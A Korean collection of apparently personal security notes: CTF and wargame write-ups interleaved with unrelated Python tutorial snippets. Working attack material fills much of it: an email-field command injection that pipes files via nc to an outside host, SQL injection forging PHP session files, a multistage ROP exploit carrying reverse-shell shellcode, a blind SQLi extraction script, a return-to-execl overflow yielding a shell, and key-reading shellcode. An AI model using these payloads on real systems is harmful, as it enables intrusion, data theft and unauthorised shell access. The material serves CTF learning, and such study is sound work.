1. python 설치  [ http://python.org ]

2. python 환경변수 등록 

[ 시스템 환경 변수 $PATH 에 C:\python\을 등록  하여 어디에서든 사용 할 수 있도록 한다]

3. paimei 설치 [ python 디버거를 설치]

OpenRCE-paimei-d78f574.rar

위파일을 다운로드 받고 dist 폴더로 들어가면 설치 파일이 이 있다. 더블클릭하여 설치한다.

설치하고나면  "C:\Python27\Lib\site-packages\pydbg\" 가 생긴다.

4. pydbg 덮어 씌우기

pydasm.pyd

"C:\Python27\Lib\site-packages\pydbg\"  에 위파일을 덮어 씌운다.

5. __init__ 에서 ctype 구조체 임폴트 시키기 

C:\Python27\Lib\ctypes\__init__.py 파일을 열어서 아래 부분을 추가해준다.

6. 이후 fuzz_hash.py 를 실행시킨다.

fuzz_hash.py

위 파일이 들어간 폴더에 퍼징할 샘플 파일들과 hash_DB.txt(emptytext) 를 생성해서 넣어준다. hash_DB.txt 는 크래시난 정보들이 저장되며, 크래시가 터질경우 crash 폴더를 자동으로 생성하여 샘플 파일을 넣는다. 

[ 실행법 ]

python 파일명 -t "타겟 프로그램" -s "샘플 위치"

$python fuzz_hash.py -t "C:\Program Files (x86)\GRETECH\GomPlayer\GOM.exe" -s "C:\k1rha\sample\"

주어진 Node.js 소스코드를 보니 E-mail이 오는 부분을 확인 할 수 있었는데, mail 이라는 명령어를 exec()를 사용하여 이메일을 보내는 것을 확인 할 수 있었고, 이를 보면 email 안에 특정 명령어를 같이 실행 시켜서 값을 찾아내야 했다.

메일에 어떠한 문자열들이 허가 되는지 부터 살펴보면 아래코드와 같다. 

아래 문자열과 더불어 띄어쓰기도 되지 않았다.

function validateEmail(email) {

        return /^(?:[\w\!\#\ \$\%\&\'\*\+\-\/\=\?\^\`\{\|\}\~]+\.)*[\w\!\#\$\%\&\'\*\+\-\/\=\?\^\`\{\|\}\~]+@(?:(?:(?:[a-zA-Z0-9](?:[a-zA-Z0-9\-](?!\.)){0,61}[a-zA-Z0-9]?\.)+[a-zA-Z0-9](?:[a-zA-Z0-9\-](?!$)){0,61}[a-zA-Z0-9]?)|(?:\[(?:(?:[01]?\d{1,2}|2[0-4]\d|25[0-5])\.){3}(?:[01]?\d{1,2}|2[0-4]\d|25[0-5])\]))$/.test(email);

}

대충 사용 할 수 있는 문자열은 아래와 같다.

|,  a-z , 0-9 , $ , & , . , { , } '  정도였다.   

띄어쓰기 문제가 가장 컸는데, 환경변수에 띄어쓰기가 있는 것을 찾았다.

[myserver]

 #nc -lvp 8888 

[회원가입->패스워드 찾기] 

  &&ls'|nc$IFS'k1rha.com'$IFS'8888'&&@gmail.com   //어떠한 파일들이 있는지 검사 

  &&cat$IFS'main.js'|nc$IFS'k1rha.com'$IFS'8888'&&@gmail.com   //main.js를 내서버로 보냄 

[main.js 파일안에 flag가 있다 ] 

if (users[email] == pass) {

if (email == 'admin@beollejavi.kr')

res.end(JSON.stringify({'code': 0, 'id': email, 'msg': 'Contgrats! flag: WHC793b5f3b55d99590fc1a7ebc1654f66b'}));

union select ..... into outfile('[파일명]');  을 이용하여 세션을 강제 주입하여 readme 권한으로 세션을 만들어야 한다. 세션을 /var/lib/php5/ 에 강제 주입시키고, 그 세션으로 하이제킹하여 readme 권한을 얻는 방법을 써야 한다. 

세션을 만들기 위해 세션이 어떤식으로 생성되는가를 봐야하는데, 이는 include 취약점을 만들어두어

소스코드를 읽을 수 있게 해 두었다. 

session 이름은 memdata 이고 id,pw,level,을 인자로서 만들어 진다는 것을 알 수 있었다.

서버에 똑같이 코딩하여 세션을 생성 하였다.

인젝션 구문을 통하여 서버에 강제로 readme 계정의 세션을 주입 시킨다.

'union select 0x6D656D646174617C733A38363A22613A343A7B733A333A22696478223B733A313A2231223B733A323A226964223B733A363A22726561646D65223B733A323A227077223B733A343A2261616161223B733A353A226C6576656C223B733A313A2231223B7D223B into outfile '/var/lib/php5/sess_k1rha' #

(여기서 세션 이름은 sess_ 가 반드시 포함되어야 하며 k1rha는 임의의 세션명이다.)

' union select 'memdata|s:161:"a:4:{s:3:"idx";s:1:"1";s:2:"id";s:5:"k2rha";s:2:"pw";s:8:"anything";s:5:"level";s:72:"2\' union select group_concat(table_name) from information_schema.tables#";}";' into outfile '/var/lib/php5/sess_customsession1'#

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARAMETERS,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLESPACES,TABLE_C : Hacking Detected

.

.

.

.

이하 생략

.

.

.

union select 'memdata|s:136:"a:4:{s:3:"idx";s:1:"1";s:2:"id";s:5:"k1rha";s:2:"pw";s:8:"anything";s:5:"level";s:47:"2\' union select k3yk3y from k3y_1s_h3r3.k3yk3y#";}";' into outfile '/var/lib/php5/sess_customsession'#

UnicodeDecodeError: 'ascii' codec can't decode byte 0x83 in position 34: ordinal not in range(128)

UnicodeDecodeError: 'utf8' codec can't decode byte 0x83 in position 34: ordinal not in range(128)

import sys, os

import xlwt

import xlrd

class READXLS():

    global filePoint

    global sheet1

    def __init__(self,file_name):

        self.filePoint = xlrd.open_workbook(file_name,formatting_info=True)

    def select_sheet (self,num):

        self.sheet1 = self.filePoint.sheet_by_index(0)

        #sheet_name = self.filePoint.sheet_by_name('colors')

    def select_row (self,num):

         print self.sheet1.row_values(num)

    def select_col (self,num):

        print self.sheet1.col_values(num)

    def select_map(self,row,col):

        print self.sheet1.cell(rowx=0,colx=0).value

def main():

    try :

        XLS = READXLS("test.xls")

    except :

        print "FILE OPEN ERROR"

    XLS.select_sheet(0)

    XLS.select_map(0,0)

if __name__ == "__main__":

    main()

#    book = xlwt.Workbook()

#    sheet1 = book.add_sheet("sheet1")

#    sheet1.write(0,0,'A1')

#    sheet1.write(0,2,"B1")   

#    book.save('test.csv')

[ Master Server ]

root@k1rha:~/PYTHON/Parallel# unzip pp-1.6.4.zip 

root@k1rha:~/PYTHON/Parallel# cd pp-1.6.4.zip

root@k1rha:~/PYTHON/Parallel/pp-1.6.4# python setup.py install

  #ppservers = ()   //같은 네트워크망이 아닐땐 요부분을 

   ppservers = ("[ A HOST IP ]:[PORT]","[ B HOST IP ]: [PORT]", )  //요렇게 고쳐준다..

 job count | % of all jobs | job time sum | time per job | job server

         9 |        100.00 |      15.5626 |     1.729183 | local

Time elapsed since server creation 8.8939139843

0 active tasks, 2 cores

root@k1rha:~/PYTHON/Parallel/pp-1.6.4/examples# 

root@k1rha:~/PYTHON/Parallel/pp-1.6.4/examples# python sum_primes.py

Usage: python sum_primes.py [ncpus]

    [ncpus] - the number of workers to run in parallel,

    if omitted it will be set to the number of processors in the system

Starting pp with 2 workers

Sum of primes below 100 is 1060

Sum of primes below 200000 is 1709600813

Sum of primes below 200100 is 1711401118

Sum of primes below 200200 is 1713002400

Sum of primes below 300300 is 3716110510

Sum of primes below 200400 is 1716407615

Sum of primes below 200500 is 1717810714

Sum of primes below 300600 is 3723922172

Sum of primes below 400700 is 6478918307

Job execution statistics:

 job count | % of all jobs | job time sum | time per job | job server

         1 |         11.11 |       4.8824 |     4.882423 | 223.194.105.176:60000

         4 |         44.44 |      11.3776 |     2.844407 | 223.194.105.178:60000

         4 |         44.44 |       8.7561 |     2.189026 | local

Time elapsed since server creation 6.6827340126

[결론] 제공된 예제코드인데 좀 쥐꼬리만큼 빨라지는 기분... 생각만큼 절반으로 줄어들 순 없는것 같다. 

from multiprocessing import Process,Queue

def do_work( start, end , result):

        sum =0;

        for i in range(start,end):

                sum += i;

        result.put(sum)

        return

if __name__ == "__main__":

        START, END = 0, 2000000

        result = Queue()

        pr1 = Process(target = do_work, args=(START, END/2 , result ))

        pr2 = Process(target = do_work, args=(END/2, END, result))

        pr1.start()

        pr2.start()

        pr1.join()

        pr2.join()

        result.put('STOP')

        sum = 0;

        while True :

                tmp = result.get()

                if tmp == 'STOP' : break

                else: sum += tmp

        print "RESULT : ", sum

root@k1rha:~/PYTHON/MultiProc# time python multi_proc.py

RESULT :  1999999000000

real 0m0.544s

user 0m0.384s

sys 0m0.176s

from threading import Thread

def do_work (start, end ,result):

        sum = 0

        for i in range(start, end):

                sum += i

        result.append(sum)

        return

if __name__ == "__main__":

        START, END = 0, 2000000

        result = list()

        th1 = Thread(target=do_work, args=(START, END/2,result))

        th2 = Thread(target=do_work, args=(END/2,END,result))

        th1.start()

        th2.start()

        th1.join()

        th2.join()

        print "result: ", sum(result)

root@k1rha:~/PYTHON/thread_ex# time python thread_ex.py 

result:  1999999000000

real 0m0.810s

user 0m0.208s

sys 0m0.668s

[ read(open("getkey",0),buff,50)) -> write(stdout,buff); ]

#include<stdio.h>

int main()

{

        asm(

        //open("./getkey",0)*

        "xor %eax, %eax\n"

        "push %eax\n"

        "push $0x79654b65\n"

        "push $0x68742f2e\n"        // [getkey] [NULL]

        "mov %eax, %ecx\n"

        "mov %esp, %ebx\n"

        "movb $5, %al\n"        // open = 5

        "int $0x80\n"

        //read(eax,buff,100);

        "xor %edx,%edx\n"

        "movb $0x50,%dl\n"

        "sub $0x50,%esp\n"

        "movl %esp,%ecx\n"

        "movl %ecx,%edi\n"

        "movl %eax,%ebx\n"

        "xor %eax,%eax\n"

        "movb $0x3,%al\n"

        "int $0x80\n"

        //write(1,buff);

        "movl %edi, %ecx\n"

        "xor %ebx,%ebx\n"

        "xor %eax,%eax\n"

        "movb $0x1, %bl\n"

        "movb $0x4, %al\n"

        "int $0x80\n"

        );

return 0;

}

 80483df: 31 c0                     xor    %eax,%eax

 80483e1: 50                           push   %eax

 80483e2: 68 65 4b 65 79       push   $0x79654b65

 80483e7: 68 2e 2f 74 68       push   $0x68742f2e

 80483ec: 89 c1                 mov    %eax,%ecx

 80483ee: 89 e3                 mov    %esp,%ebx

 80483f0: b0 05                 mov    $0x5,%al

 80483f2: cd 80                         int    $0x80

 80483f4: 31 d2                        xor    %edx,%edx

 80483f6: b2 50                 mov    $0x50,%dl

 80483f8: 83 ec 50             sub    $0x50,%esp

 80483fb: 89 e1                 mov    %esp,%ecx

 80483fd: 89 cf                         mov    %ecx,%edi

 80483ff: 89 c3                        mov    %eax,%ebx

 8048401: 31 c0                        xor    %eax,%eax

 8048403: b0 03                     mov    $0x3,%al

 8048405: cd 80                     int    $0x80

 8048407: 89 f9                         mov    %edi,%ecx

 8048409: 31 db                         xor    %ebx,%ebx

 804840b: 31 c0                 xor    %eax,%eax

 804840d: b3 01                     mov    $0x1,%bl

 804840f: b0 04                 mov    $0x4,%al

 8048411: cd 80                     int    $0x80

[64비트에서는 이놈들이 어디 있는겨? -_-... 복사 해놨다가. 그때그때 찾아써야겠다..]

/usr/linux/asm/unistd.h  32bit unistd.h System call Number 

#define __NR_exit 1    - move extended read/write file pointer

#define __NR_fork 2   - create a new process

#define __NR_read 3  - read from file

#define __NR_write 4

#define __NR_open 5

#define __NR_close 6

#define __NR_waitpid 7

#define __NR_creat 8

#define __NR_link 9

#define __NR_unlink 10

#define __NR_execve 11

#define __NR_chdir 12

#define __NR_time 13

#define __NR_mknod 14

#define __NR_chmod 15

#define __NR_lchown 16

#define __NR_break 17

#define __NR_oldstat 18

#define __NR_lseek 19

#define __NR_getpid 20

#define __NR_mount 21

#define __NR_umount 22

#define __NR_setuid 23

#define __NR_getuid 24

#define __NR_stime 25

#define __NR_ptrace 26

#define __NR_alarm 27

#define __NR_oldfstat 28

#define __NR_pause 29

#define __NR_utime 30

#define __NR_stty 31

#define __NR_gtty 32

#define __NR_access 33

#define __NR_nice 34

#define __NR_ftime 35

#define __NR_sync 36

#define __NR_kill 37

#define __NR_rename 38

#define __NR_mkdir 39

#define __NR_rmdir 40

#define __NR_dup 41

#define __NR_pipe 42

#define __NR_times 43

#define __NR_prof 44

#define __NR_brk 45

#define __NR_setgid 46

#define __NR_getgid 47

#define __NR_signal 48

#define __NR_geteuid 49

#define __NR_getegid 50

#define __NR_acct 51

#define __NR_umount2 52

#define __NR_lock 53

#define __NR_ioctl 54

#define __NR_fcntl 55

#define __NR_mpx 56

#define __NR_setpgid 57

#define __NR_ulimit 58

#define __NR_oldolduname 59

#define __NR_umask 60

#define __NR_chroot 61

#define __NR_ustat 62

#define __NR_dup2 63

#define __NR_getppid 64

#define __NR_getpgrp 65

#define __NR_setsid 66

#define __NR_sigaction 67

#define __NR_sgetmask 68

#define __NR_ssetmask 69

#define __NR_setreuid 70

#define __NR_setregid 71

#define __NR_sigsuspend 72

#define __NR_sigpending 73

#define __NR_sethostname 74

#define __NR_setrlimit 75

#define __NR_getrlimit 76

#define __NR_getrusage 77

#define __NR_gettimeofday 78

#define __NR_settimeofday 79

#define __NR_getgroups 80

#define __NR_setgroups 81

#define __NR_select 82

#define __NR_symlink 83

#define __NR_oldlstat 84

#define __NR_readlink 85

#define __NR_uselib 86

#define __NR_swapon 87

#define __NR_reboot 88

#define __NR_readdir 89

#define __NR_mmap 90

#define __NR_munmap 91

#define __NR_truncate 92

#define __NR_ftruncate 93

#define __NR_fchmod 94

#define __NR_fchown 95

#define __NR_getpriority 96

#define __NR_setpriority 97

#define __NR_profil 98

#define __NR_statfs 99

#define __NR_fstatfs 100

#define __NR_ioperm 101

#define __NR_socketcall 102

#define __NR_syslog 103

#define __NR_setitimer 104

#define __NR_getitimer 105

#define __NR_stat 106

#define __NR_lstat 107

#define __NR_fstat 108

#define __NR_olduname 109

#define __NR_iopl 110

#define __NR_vhangup 111

#define __NR_idle 112

#define __NR_vm86old 113

#define __NR_wait4 114

#define __NR_swapoff 115

#define __NR_sysinfo 116

#define __NR_ipc 117

#define __NR_fsync 118

#define __NR_sigreturn 119

#define __NR_clone 120

#define __NR_setdomainname 121

#define __NR_uname 122

#define __NR_modify_ldt 123

#define __NR_adjtimex 124

#define __NR_mprotect 125

#define __NR_sigprocmask 126

#define __NR_create_module 127

#define __NR_init_module 128

#define __NR_delete_module 129

#define __NR_get_kernel_syms 130

#define __NR_quotactl 131

#define __NR_getpgid 132

#define __NR_fchdir 133

#define __NR_bdflush 134

#define __NR_sysfs 135

#define __NR_personality 136

#define __NR_afs_syscall 137 /* Syscall for Andrew File System */

#define __NR_setfsuid 138

#define __NR_setfsgid 139

#define __NR__llseek 140

#define __NR_getdents 141

#define __NR__newselect 142

#define __NR_flock 143

#define __NR_msync 144

#define __NR_readv 145

#define __NR_writev 146

#define __NR_getsid 147

#define __NR_fdatasync 148

#define __NR__sysctl 149

#define __NR_mlock 150

#define __NR_munlock 151

#define __NR_mlockall 152

#define __NR_munlockall 153

#define __NR_sched_setparam 154

#define __NR_sched_getparam 155

#define __NR_sched_setscheduler 156

#define __NR_sched_getscheduler 157

#define __NR_sched_yield 158

#define __NR_sched_get_priority_max 159

#define __NR_sched_get_priority_min 160

#define __NR_sched_rr_get_interval 161

#define __NR_nanosleep 162

#define __NR_mremap 163

#define __NR_setresuid 164

#define __NR_getresuid 165

#define __NR_vm86 166

#define __NR_query_module 167

#define __NR_poll 168

#define __NR_nfsservctl 169

#define __NR_setresgid 170

#define __NR_getresgid 171

#define __NR_prctl 172

#define __NR_rt_sigreturn 173

#define __NR_rt_sigaction 174

#define __NR_rt_sigprocmask 175

#define __NR_rt_sigpending 176

#define __NR_rt_sigtimedwait 177

#define __NR_rt_sigqueueinfo 178

#define __NR_rt_sigsuspend 179

#define __NR_pread 180

#define __NR_pwrite 181

#define __NR_chown 182

#define __NR_getcwd 183

#define __NR_capget 184

#define __NR_capset 185

#define __NR_sigaltstack 186

#define __NR_sendfile 187

#define __NR_getpmsg 188 /* some people actually want streams */

#define __NR_putpmsg 189 /* some people actually want streams */

#define __NR_vfork 190

#define __NR_ugetrlimit 191 /* SuS compliant getrlimit */

#define __NR_mmap2 192

#define __NR_truncate64 193

#define __NR_ftruncate64 194

#define __NR_stat64 195

#define __NR_lstat64 196

#define __NR_fstat64 197

#define __NR_lchown32 198

#define __NR_getuid32 199

#define __NR_getgid32 200

#define __NR_geteuid32 201

#define __NR_getegid32 202

#define __NR_setreuid32 203

#define __NR_setregid32 204

#define __NR_getgroups32 205

#define __NR_setgroups32 206

#define __NR_fchown32 207

#define __NR_setresuid32 208

#define __NR_getresuid32 209

#define __NR_setresgid32 210

#define __NR_getresgid32 211

#define __NR_chown32 212

#define __NR_setuid32 213

#define __NR_setgid32 214

#define __NR_setfsuid32 215

#define __NR_setfsgid32 216

#define __NR_pivot_root 217

#define __NR_mincore 218

#define __NR_madvise 219

#define __NR_madvise1 219 /* delete when C lib stub is removed */

#define __NR_getdents64 220

#define __NR_fcntl64 221

#define __NR_security 223 /* syscall for security modules */

#define __NR_gettid 224

#define __NR_readahead 225

#define __NR_setxattr 226

#define __NR_lsetxattr 227

#define __NR_fsetxattr 228

#define __NR_getxattr 229

#define __NR_lgetxattr 230

#define __NR_fgetxattr 231

#define __NR_listxattr 232

#define __NR_llistxattr 233

#define __NR_flistxattr 234

#define __NR_removexattr 235

#define __NR_lremovexattr 236

#define __NR_fremovexattr 237

#define __NR_tkill 238

#define __NR_sendfile64 239

#define __NR_futex 240

#define __NR_sched_setaffinity 241

#define __NR_sched_getaffinity 242

#define __NR_set_thread_area 243

#define __NR_get_thread_area 244

/* #define __NR_io_setup 245 */

/* #define __NR_io_destroy 246 */

/* #define __NR_io_getevents 247 */

/* #define __NR_io_submit 248 */

/* #define __NR_io_cancel 249 */

/* #define __NR_alloc_hugepages 250 */

/* #define __NR_free_hugepages 251 */

#define __NR_exit_group 252

/* #define __NR_lookup_dcookie 253 */

/* #define __NR_sys_epoll_create 254 */

/* #define __NR_sys_epoll_ctl 255 */

/* #define __NR_sys_epoll_wait 256 */

/* #define __NR_remap_file_pages 257 */

#define __NR_set_tid_address 258

문제코드는 아래와 같다 약간의 난독화가 되어 있었는데, 같은 문자열을 치환시켜서 

대충 맞추면 소켓서버가 완성되었다. 파이썬 코드가 워낙 직관적이기에 쉽게 진행 할 수 있었다.

#!/usr/bin/python

import socket

import os

import subprocess

import SocketServer

import sys

def MSG_CHECK ( msg ) :

if "N3Sk" in msg [ 50 : ] :

return "NESK"

else :

return "PESK"

def OPEN_READ_CHECK ( msg ) :

if "open" in msg or "read" in msg :    // msg 에 read 나 open 이 있으면 false  두개가 없으면 NESK

return "false"

else :

return "NESK"  

def CHECK_50_N3Sk ( sock ) :

sock . send ( "UNEXPLOITABLE!\n" )   

class EchoHandler ( SocketServer . BaseRequestHandler ) :

def handle ( self ) :

MESSAGE = self . request . recv ( 200 ) . strip ( )    // 띄어쓰기없이 200바이트를 받아들임

try :

if len ( MESSAGE ) > 5 :

RECV_RESULT = MSG_CHECK ( MESSAGE )  

//  문자열이 5글자 이상이면 MSG_CHECK를 함  50번째 이후에 N3Sk가 있어야 NESK를 리턴 

if RECV_RESULT == "NESK" :  // msg 50번째 이후에 N3Sk가 있으면 참 값..

try :

if OPEN_READ_CHECK ( MESSAGE ) == "NESK" :   

                                                                               // OEPN_READ 함수의 값이 NESK 이면(즉 open read가 없으면)

       //이부분에서 open 이나 read 함수를 쓸수 없다는 것을 말함.

exec MESSAGE //MSG를 실행함.

except :

return

else :

CHECK_50_N3Sk ( self . request )

except KeyError , IIII :

pass

if __name__ == "__main__" :

SOCK_SERVER = SocketServer . TCPServer ( ( "localhost" , 7997 ) , EchoHandler )

SOCK_SERVER . serve_forever ( )

root@k1rha:/HACK/HDCON# 

python -c 'print "import os;os.system(\"cat key >&4 \");"+"A"*50+"N3Sk=0"' | nc 127.0.0.1 7997

Get key succcess 

root@k1rha:/HACK/HDCON# 

<script language="javascript">

function commify(n) {

  var reg = /(^[+-]?\d+)(\d{3})/;   // 정규식

  n += '';                          // 숫자를 문자열로 변환

  while (reg.test(n))

    n = n.replace(reg, '$1' + ',' + '$2');

  return n;

}

공격 페이로드는 아래와 같다.

STAGE1 = SEND + PPPR + SOCKFD + GOT_TIME + VALUE_0x4 + NULL + \

              FUNC + AAAA + SOCKFD

STAGE2 = MPROTECT + PPPR + CUSTOM_STACK + SIZEOF_CUSTOM + MODE_EXEC +\

               RECV + RETURN_CUSTOM + SOCKFD + CUSTOM_STACK + SHELLCODELEN + NULL

STAGE3 = SELLCODE

from socket import *

import sys

import struct

SHELLCODE ="\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00\x01\x66\x68\x22\xb8\x66\xb9\x02\x00\x66\x51\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0\x66\x31\xdb\x43\x43\x43\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"

SHELLCODELEN = struct.pack('<L', len(SHELLCODE))

PLT_SEND = 0x08048610

GOT_TIME = 0x804a004

ADDR_FUNC = 0x080486d4

PPPR = struct.pack('<L', 0x804878d)

PPPPR = struct.pack('<L', 0x80489cc)

STAGE1 = '\x41' * 1036 + struct.pack('<L', PLT_SEND) + PPPPR + '\x04\x00\x00\x00' + struct.pack('<L', GOT_TIME)

STAGE1 += '\x04\x00\x00\x00' + '\x00\x00\x00\x00' +struct.pack('<L', ADDR_FUNC) + '\x41\x41\x41\x41' + '\x04\x00\x00\x00'

if __name__ == '__main__':

s = socket(AF_INET, SOCK_STREAM)

s.connect(('127.0.0.1', 7777))

s.recv(1024)

s.send(STAGE1)

ADDR_TIME = struct.unpack('<L', s.recv(4))[0]

ADDR_MPROTECT = ADDR_TIME + 0x41B70

ADDR_RECV = ADDR_TIME + 0x48080

STAGE2 = '\x41' * 1036 + struct.pack('<L',ADDR_MPROTECT ) + PPPR + '\x00\x80\x04\x08' + '\x00\x10\x00\x00'

STAGE2 += '\x07\x00\x00\x00' + struct.pack('<L', ADDR_RECV) + '\x91\x87\x04\x08' + '\x04\x00\x00\x00'

STAGE2 += '\x91\x87\x04\x08' + SHELLCODELEN + '\x00\x00\x00\x00'

s.recv(1024)

s.send(STAGE2)

s.send(SHELLCODE)

s.close()

#python

from socket import *

import sys

import struct

IP = "127.0.0.1"

PORT = 80

STD_STR = "1 a"

def MakePacket(UNIT,NUM,RAW=0):

HEADER = "GET /mysql_test.php?id=1%26%26hex(mid((select%0atable_name%0afrom%0ainformation_schema.tables%0alimit%0a1,1),"+str(UNIT)+",1))="

FOOTER = " HTTP/1.0\r\n\r\n"

SEND_PACKET =  HEADER + str(NUM) + FOOTER

return SEND_PACKET

def SendPacket(UNIT, NUM):

sock  = socket(AF_INET,SOCK_STREAM)

sock.connect((IP,PORT))

_sendData = MakePacket(UNIT,NUM)

sock.send(_sendData)

data=sock.recv(10240)

return data 

def main():

RESULT=''

for i in range (1,20):

for j in range (30,128):

RES = SendPacket(i,j)

if RES.find(STD_STR) > 0 :

RESULT = RESULT + str(j)

print RESULT.decode("hex")

if __name__== "__main__" :

main()

Lambda 표현식은 C언어의 메크로 함수와 비슷한 역할을 하는 것 같다.

g = lambda x,y : x*y

>> g(2,3)

6

>> g(3,4)

12

>>

p = lambda x : pack("<L" , x)

"  <  "  : little endian

"  >  "  : big endian

L : Unsigned Long 형태  (32bit 에서 자주쓰임)

Q : Unsinged Long Long 형태 (64bit에서 자주 쓰임)

p(0x08040552) 하면 little endian 으로 Long 형태로 변환되어 packing 된다.

Format        C Type         Python        

x         pad byte            no value         

c         char                   string         

b         signed char         integer         

B         unsigned char       integer         

?         _Bool                 bool        

h         short                     integer         

H         unsigned short      integer         

i         int                     integer         

I         unsigned int            integer or long         

l         long                     integer         

L         unsigned long       long         

q         long long               long        

Q         unsigned long     long      

f         float                     float         

d         double             float         

s         char[]             string         

p         char[]             string         

P         void *             long         

Character       Byte order       Size and alignment

@         native         native

=         native         standard

<         little-endian           standard

>         big-endian               standard

!         network (= big-endian)  standard

import thread, time

def counter(id):

    for i in range(5):

        print 'id %s --> %s' % (id, i)

        time.sleep(1)

for i in range(5):

    thread.start_new_thread(counter, (i,))

time.sleep(5)

print 'Exiting'

(gdb) p execl

$1 = {<text variable, no debug info>} 0x832d68 <execl>

0x08048451 <main+109>: ret    

RET = 0x08048451

execl  = 0x832d68

[dark_stone@Fedora_2ndFloor ~]$ sstrace -i ./cruel `python -c 'print "a"*260+"\x51\x84\x04\x08"*7+"\x68\x2d\x83"'`

[008a1402] execve("./cruel", ["./cruel", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"...], [/* 20 vars */]) = 0

.

.

[009c1402] execve("<춯", ["", "U\211\345WVS\203\354\f\350", "", "Q\204\4\10Q\204\4\10\234\245\307\277\364\257\214", "\205\300uSe\241T"], [/* 20 vars */]) = -1 ENOENT (No such file or directory)  //execl 의 인자가 짧다.

[dark_stone@Fedora_2ndFloor ~]$ strace -i ./cruel `python -c 'print "a"*260+"\x51\x84\x04\x08"*7+"\x68\x2d\x83"'` 2> result.txt

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaQ?Q?Q?Q?Q?Q?Q?h-?

[dark_stone@Fedora_2ndFloor ~]$

[dark_stone@Fedora_2ndFloor ~]$ xxd result.txt 

.

.

.

0000740: 6435 3430 325d 2065 7865 6376 6528 223c  d5402] execve("<

0000750: ad8c 222c 205b 2222 2c20 2255 5c32 3131  ..", ["", "U\211

.

.

 execl 인자값 :  \x3\xad\x8c 가 이자값이 되어 실행 되었다.

[dark_stone@Fedora_2ndFloor ~]$ cat system.c

#include<stdio.h>

int main(int argc, char *argv[]){

setreuid(geteuid(),geteuid());

system("/bin/sh");

}

[dark_stone@Fedora_2ndFloor ~]$ export PATH=$PATH:/home/dark_stone  

[dark_stone@Fedora_2ndFloor ~]$ ln -s system `python -c 'print "\x3c\xad\x8c"'`

[ buffer = 260 ] [ RET ] * 7 , [ execl ] [ 어딘가의 인자값 ]

                                                      \x3c\xad\x8c -> "/bin/sh 을 실행시켜주는 프로그램 "

[dark_stone@Fedora_2ndFloor ~]$ ./cruel `python -c 'print "a"*260+"\x51\x84\x04\x08"*7+"\x68\x2d\x83"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaQ?Q?Q?Q?Q?Q?Q?h-?

sh-3.00$ id

uid=501(cruel) gid=500(dark_stone) groups=500(dark_stone) context=user_u:system_r:unconfined_t

sh-3.00?y-pass

sh: ?y-pass: command not found

sh-3.00$ my-pass

euid = 501

come on, come over

sh-3.00$ 

root@ubuntu:/home/root/ropeme-bhus10# ls

README  distorm-1.7.30  distorm-1.7.30.tar.gz  exploit.py  ropeme  vuln  vuln.c

root@ubuntu:/home/root/ropeme-bhus10#tar -xvf distorm-1.7.30.tar.gz

root@ubuntu:/home/root/ropeme-bhus10# cd distorm-1.7.30/

root@ubuntu:/home/root/ropeme-bhus10/distorm-1.7.30# ls

COPYING   PKG-INFO  cygwin-x86  linux-x86_64  macosx-x86  setup.py       windows-x86

MANIFEST  build     linux-x86   macosx-ppc    setup.cfg   windows-amd64

root@ubuntu:/home/root/ropeme-bhus10/distorm-1.7.30# ./setup.py build

root@ubuntu:/home/root/ropeme-bhus10/distorm-1.7.30# ./setup.py install

root@ubuntu:/home/root/ropeme-bhus10/ropeme# ./ropshell.py 

Simple ROP interactive shell: [generate, load, search] gadgets

ROPeMe> 

root@ubuntu:/home/root/ropeme-bhus10# ls

README  distorm-1.7.30  distorm-1.7.30.tar.gz  exploit.py  ropeme  vuln  vuln.c

root@ubuntu:/home/root/ropeme-bhus10# ./ropeme/ropshell.py 

Simple ROP interactive shell: [generate, load, search] gadgets

ROPeMe> generate vuln

Generating gadgets for vuln with backward depth=3

It may take few minutes depends on the depth and file size...

Processing code block 1/1

Generated 60 gadgets

Dumping asm gadgets to file: vuln.ggt ...

OK

ROPeMe> 

ROPeMe> search pop ?     //? 는 검색문자열의 주소이고 

Searching for ROP gadget:  pop ? with constraints: []

0x80484b4L: pop ebp ;;

0x8048573L: pop ebp ;;

0x80485d8L: pop ebp ;;

ROPeMe> search pop %   //% 는 검색 문자열의 포함 주소이다.

Searching for ROP gadget:  pop % with constraints: []

0x8048384L: pop eax ; pop ebx ; leave ;;

0x80485d8L: pop ebp ; ret ; mov ebx [esp] ;;

0x80484b4L: pop ebp ;;

0x8048573L: pop ebp ;;

0x80485d8L: pop ebp ;;

0x8048385L: pop ebx ; leave ;;

0x8048625L: pop ebx ; leave ;;

0x80484b3L: pop ebx ; pop ebp ;;

0x8048608L: pop ebx ; pop ebp ;;

0x8048624L: pop ecx ; pop ebx ; leave ;;

0x80485d7L: pop edi ; pop ebp ;;

0x80485d6L: pop esi ; pop edi ; pop ebp ;;

ROPeMe> 

